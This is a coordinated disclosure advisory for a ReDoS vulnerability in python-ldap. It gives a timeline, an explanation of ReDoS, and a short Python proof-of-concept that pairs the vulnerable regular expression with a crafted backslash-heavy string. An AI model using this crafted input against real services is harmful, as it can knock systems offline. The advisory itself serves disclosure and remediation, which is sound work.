Coordinated Disclosure Timeline
- 2021-08-31: Created an issue asking for contact details.
- 2021-09-01: Draft advisory created: GHSA-r8wq-qrxc-hmcm.
- 2021-10-15: Created a pull request in the temporary private fork with my suggested fix.
- 2021-11-26: GHSA-r8wq-qrxc-hmcm published.
python-ldap contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
The vulnerable regular expression is here.
To see that the regular expression is vulnerable, copy-paste it into a separate file as shown below:
- Run the code below with
import re TOKENS_FINDALL = re.compile( r"(\()" # opening parenthesis r"|" # or r"(\))" # closing parenthesis r"|" # or r"([^'$()\s]+)" # string of length >= 1 without '$() or whitespace r"|" # or r"('(?:[^'\\]|\\\\|\\.)*?'(?!\w))" # any string or empty string surrounded by unescaped # single quotes except if right quote is succeeded by # alphanumeric char r"|" # or r"([^\s]+?)", # residue, all non-whitespace strings ).findall # triggers ReDoS l = TOKENS_FINDALL("'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\");
This issue may lead to a denial of service.
You can contact the GHSL team at
firstname.lastname@example.org, please include a reference to
GHSL-2021-117 in any communication regarding this issue.